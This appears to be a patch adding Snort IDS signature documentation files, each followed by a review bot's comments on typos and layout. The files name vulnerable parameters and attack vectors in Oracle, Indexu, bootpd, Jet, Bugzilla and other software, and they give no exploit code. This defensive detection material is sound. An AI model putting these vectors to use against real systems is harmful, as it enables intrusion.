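Review bot: the file is doc/signatures/176.txt but the Sid section says 146, so either the filename or the number is wrong and the doc will be attached to the wrong rule; reconcile the two. The file also omits the Affected Systems section (the list "Windows 95 / 98 / ME" sits under Detailed Information instead), breaking the layout every other file follows. Minor: "sever" in the registry sentence should be "server", and "attackers" and "victims" need apostrophes.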
--- /dev/null
+++ b/doc/signatures/2621.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2621
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "register_flavor_change" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the second variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
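Review bot: the sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is Snort configuration advice sitting in Detailed Information and applies to the sensor, not the database; move it to a note on rule configuration and say why only Windows is singled out, or drop it. Attack Scenarios says the overflow is in "the second variable" while Detailed Information says only "a parameter"; name the parameter once and use it in both places. Also "a Oracle" in Summary should be "an Oracle", and the double blank line before the $ORACLE_PORTS sentence should go.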
--- /dev/null
+++ b/doc/signatures/100000621.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000621
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "log_search.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "log_search.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
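Review bot: the Attack Scenarios paragraph ("An attacker can access an authentication mechanism and supply his/her own credentials ...") and the third Detailed Information paragraph about validating client credentials have nothing to do with the remote file include via "admin_template_path" in "log_search.php" that this rule matches; replace them with a sentence about the remote URL being included and executed as PHP. Fix "ona" and the redundant "an exploitation attempt has been attempted" in Summary, add the missing blank lines before the "--" after Affected Systems and Contributors, and fill in Additional References.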
--- /dev/null
+++ b/doc/signatures/318.txt
@@ -0,0 +1,64 @@
+SID:
+318
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attempt is made to exploit a vulnerable 
+version of bootpd
+--
+
+Impact:
+If attack is successful, total system compromise from a remote attacker
+--
+
+Detailed Information:
+Due to improper handling of bounds checking in bootp request packets 
+Bootpd version 2.4.3(and earlier) is susceptible to several types of 
+buffer overflows. A successful exploit will result in complete 
+compromise of the attacked system. Any system running Bootpd version 
+Stanford University bootpd 2.4.3 should consider themselves vulnerable
+--
+
+Affected Systems:
+	Debian Linux 1.1
+	Debian Linux 1.2
+	Debian Linux 1.3
+	Debian Linux 1.3.1
+	Debian Linux 2.0
+	Stanford University bootpd 2.4.3
+--
+
+Attack Scenarios:
+An attacker can exploit vulnerable bootpd servers and modify system 
+files as the root user or create a shell with root privileges
+--
+
+Ease of Attack:
+Simple, Sample code exists
+--
+
+False Positives:
+none
+--
+
+False Negatives:
+none
+--
+
+Corrective Action:
+Vendors have supplied patched versions of bootpd, upgrade
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
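Review bot: this file does not follow the layout of the other signature docs: "SID:" precedes "Rule:", each "--" separator sits directly under the section text with the blank line after it instead of before, and the last heading is "References:" rather than "Additional References:"; normalise it so the docs can be parsed consistently. The last Detailed Information sentence is garbled ("Any system running Bootpd version Stanford University bootpd 2.4.3 should consider themselves vulnerable"); rewrite it as a sentence about Stanford bootpd 2.4.3 and earlier, matching the first sentence. Also "2.4.3(and earlier)" needs a space, "Simple, Sample code exists" should be two sentences, and "none" under False Positives and False Negatives should be capitalised and punctuated like the other files.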
--- /dev/null
+++ b/doc/signatures/2782.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2782
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
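Review bot: the last Detailed Information paragraph is broken across lines with a stray leading period ("vulnerability in the procedure drop_snapshot_repobject" / ". This procedure is included in" / "dbms_repcat."); join it into one sentence so the procedure name is not orphaned. Affected Systems repeats the vendor name ("Oracle Oracle9i"). Several "--" separators and section labels carry trailing whitespace, which the other files do not have.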
--- /dev/null
+++ b/doc/signatures/1216.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1216
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
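Review bot: the doc never says what sid 1216 matches: Summary, Detailed Information and Attack Scenarios are all generic web-server text ("the attack scenarios are legion"), so it gives an analyst nothing to validate a hit against; state the URI or content pattern the rule looks for and which server or application it concerns, and fill in Additional References. The third Detailed Information paragraph about validating client credentials is boilerplate that adds nothing here.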
--- /dev/null
+++ b/doc/signatures/567.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+567
+
+--
+Summary: 
+This event is generated when a failed attempt is made to use a Simple Mail Transfer Protocol (SMTP) server to relay mail to a third party.
+
+--
+Impact: 
+Rejected of unauthorized use.  This event indicates that an SMTP server is properly configured to reject mail relay attempts.
+
+
+--
+Detailed Information: 
+An attacker may attempt to use an improperly configured SMTP server to relay mail, reflecting the origin of the mail to be the relay SMTP server instead of the actual sender.  A poorly configured SMTP server may be used to relay spam and other undesirable mail.  If an SMTP server rejects relay attempts, it will return an error message indicating the failure.  
+
+--
+Affected Systems: 
+SMTP servers
+
+--
+Attack Scenarios: 
+An attacker may attempt to relay mail through an improperly configured SMTP server.
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+An SMTP server may reject mail using other errors.
+
+--
+Corrective Action: 
+Configure an SMTP server to reject relayed mail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS249
+
+Miscellaneous
+http://mail-abuse.org/tsi/ar-fix.html
+
+--
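Review bot: "Rejected of unauthorized use." in Impact is ungrammatical; "Rejection of unauthorized use." matches the sentence that follows. Since the event fires only when the relay attempt is refused, Corrective Action should say that the alert confirms the server is configured correctly and that the source address is what deserves attention, rather than implying a change is needed on the server. Trailing whitespace follows several "--" separators and section labels.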
--- /dev/null
+++ b/doc/signatures/2073.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2073
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Bugzilla.
+
+--
+Impact:
+Disclosure of sensitive information.
+
+--
+Detailed Information:
+The file globals.pl contains global variables used by Bugzilla 
+components. It is possible for this file to be read by a user via a web 
+browser.
+
+Details such as the username and password of the administrator account 
+for the database are stored in this file.
+
+--
+Affected Systems:
+Mozilla Bugzilla 2.4
+
+Mozilla Bugzilla 2.6
+
+Mozilla Bugzilla 2.8 for:
+	Microsoft Windows 95, 98, NT 3.51 and NT 4.0
+
+Mozilla Bugzilla 2.10
+
+--
+Attack Scenarios:
+The attacker merely needs to make a direct request for the file via a 
+browser or other agent.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches from the vendor.
+
+Ensure that the file globals.pl is not world readable.
+
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0330
+
+Bugtraq:
+http://www.securityfocus.com/bid/2671
+
+--
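Review bot: the Corrective Action item "Ensure that the file globals.pl is not world readable." will not stop the disclosure described in Detailed Information: the file is read "via a web browser", so the web server process can read it regardless of the world bit and will still serve it; the needed control is to deny HTTP access to globals.pl in the web server configuration or keep it outside the document root, in addition to the vendor patch. Affected Systems lists Bugzilla 2.4 through 2.10 but only 2.8 carries a platform list ("Microsoft Windows 95, 98, NT 3.51 and NT 4.0"), which reads as if the other versions were platform-specific; clarify whether the platforms apply to all listed versions.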
--- /dev/null
+++ b/doc/signatures/100000763.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000763
+--
+Summary:
+This event is generated when an attempt is made to access the file "config.inc which contains known vulnerabilities in the "Kamikaze-QSCM" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known vulnerabilities from a remote machine used by the "Kamikaze-QSCM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Kamikaze-QSCM
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
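Review bot: Summary has an unbalanced quote ("config.inc which contains known vulnerabilities in the "Kamikaze-QSCM""); close it after config.inc. More importantly, neither Summary nor Detailed Information says what the vulnerability in config.inc is (a file that "contains known vulnerabilities" is not a description), so the reader cannot judge the Impact claims of administrative access and code execution; state what access to config.inc discloses or allows. The credential-validation paragraph and the Attack Scenarios text about supplying credentials do not relate to direct access of a configuration file. Fix "ona".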
--- /dev/null
+++ b/doc/signatures/2380.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2380
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
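Review bot: the vendor is spelled "Checkpoint" in the Summary and Impact but "CheckPoint" in Affected Systems; pick one. Detailed Information says SecuRemote and SecureClient contain the same error, yet Affected Systems lists only FW-1 and VPN-1 versions; either add the client products with versions or drop them from the description. "Rule:  " and the "-- " before Additional References carry trailing whitespace, and Additional References is empty for a known, patched vulnerability, so a vendor advisory link would help an analyst confirm patch status.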
--- /dev/null
+++ b/doc/signatures/1022.txt
@@ -0,0 +1,63 @@
+Note rule content has been altered for this rule.  Don't know if we should say so in documentation.
+Rule:
+
+--
+Sid:
+1022
+
+--
+Summary:
+This event is generated when an attempt is made to execute a shell command possibly associated with an exploit with the Microsoft Jet database engine. 
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft Jet database engine facilitates the addition, modification, deletion, and search of database data.  Jet may be used as a backend for web applications.  It allows the use of embedded Visual Basic for Application expressions in SQL strings.  A vulnerability associated with inadequate filtering of user input allows an attacker to execute code on the vulnerable server by supplying a command delimited by "|" characters.
+
+--
+Affected Systems:
+Jet 3.5, 3.51
+
+--
+Attack Scenarios:
+An attacker can craft a special URL to execute arbitrary commands on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable Jet ODBC drivers if they are not required.
+
+Upgrade to Jet 4.0.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms99-030.asp
+
+Bugtraq:
+http://www.securityfocus.com/bid/286
+
+
+--
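Review bot: the first line, "Note rule content has been altered for this rule.  Don't know if we should say so in documentation.", is an author's working note placed above "Rule:" and will ship inside the documentation file; move it to the changelog or drop it. In the Summary, "an exploit with the Microsoft Jet database engine" should be "an exploit of the Microsoft Jet database engine". The "+ " line before the Corrective Action separator is a stray space-only line.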
--- /dev/null
+++ b/doc/signatures/1588.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1588
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
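Review bot: nothing in this file says what SID 1588 actually matches; Summary, Detailed Information, Affected Systems and Attack Scenarios are the generic web-server text that appears verbatim again in 1147.txt and 1576.txt in this patch, so an analyst looking up the alert learns nothing about the request that triggered it. Suggest naming the file or URI pattern the rule looks for. "attackers choosing" in the Impact needs the possessive, and the Summary, Impact and Detailed Information lines end in trailing whitespace.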
--- /dev/null
+++ b/doc/signatures/2276.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2276
+
+--
+Summary:
+This event is generated when an attempt is made to access a
+demonstration application which may contain vulnerabilties on a server
+using the Oracle database system for the application.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Remove the demo set of scripts
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
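Review bot: Affected Systems says "All systems using a web server." while the Summary scopes this rule to a demonstration application shipped with the Oracle database; narrow it to that product, since the Detailed Information paragraphs are the generic web-server text and never mention Oracle either. "vulnerabilties" in the Summary should be "vulnerabilities", and "Remove the demo set of scripts" is missing its full stop.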
--- /dev/null
+++ b/doc/signatures/100000579.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000579
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_struc.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_struc.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
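Review bot: "may indicate that an exploitation attempt has been attempted" in the Summary is redundant; "may indicate an exploitation attempt" is enough. "ona web server" in the Detailed Information should be "on a web server", and "attackers choosing" needs the possessive. Layout differs from the rest of the patch: there is no blank line after the Sid value and none before the "--" following Affected Systems and Contributors, and most wrapped lines end in a trailing space.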
--- /dev/null
+++ b/doc/signatures/942.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+942
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
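Review bot: Additional References is empty although the Summary describes a known vulnerability in FrontPage Server Extensions; a vendor bulletin link would let an analyst confirm patch status. The Impact adds "Denial of Service is possible" but neither Detailed Information nor Attack Scenarios mention a DoS vector; describe it or drop it. "attackers choosing" in the Impact needs the possessive, and the first Summary line has trailing whitespace.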
--- /dev/null
+++ b/doc/signatures/119-11.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+119-11
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This event may also constitute an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of directory traversal in a web request. This may be an attempt to
+escape the web root directory or it may be an attempt to evade an IDS.
+
+--
+Affected Systems:
+	Microsoft IIS Servers
+
+--
+Attack Scenarios: 
+An attacker may supply a path to a file outside the web root by using
+"../" in the uri.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+This event may be generated if a web site uses "../" in links to other
+files on the site.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
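Review bot: Affected Systems lists only "Microsoft IIS Servers", but Detailed Information describes http_inspect flagging "../" in any web request, so the scope is every web server the preprocessor inspects; widen the entry or explain why IIS alone. The False Positives entry is a good one to keep. "uri" in Attack Scenarios should be "URI", "pre-processor" is hyphenated here but is one word in Snort's own documentation, and several "-- " separators plus the Daniel Roelker contributor line carry trailing whitespace.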
--- /dev/null
+++ b/doc/signatures/100000653.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000653
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "name" parameter in the "index.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
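Review bot: the Impact paragraph ("system integrity compromise", "administrative access to the server", "execution of arbitrary code") does not match the vulnerability described: Detailed Information and Attack Scenarios describe a cross site scripting issue via a link a user clicks, whose impact falls on that user's browser session (information theft), not on the server. Restate the Impact for the client-side risk. The Sid value and the Affected Systems line lack the blank line before "--" used elsewhere in the patch, and most wrapped lines have trailing spaces.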
--- /dev/null
+++ b/doc/signatures/2335.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 
+2335
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in AppleShare IP FTP Server.
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious
+activity in FTP traffic between hosts.
+
+It is possible for a user to supply data to an FTP command, in this case
+RMD, and cause the service to become unavailble to other users.
+
+--
+Affected Systems:
+	Apple AppleShare IP 5.0, 5.0.1, 5.0.2, 5.0.3
+	Apple AppleShare IP 6.1, 6.2, 6.3, 6.3.1
+
+--
+Attack Scenarios:
+An attacker needs to login to the service and use the RMD command in a
+specific manner to cause the DoS.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
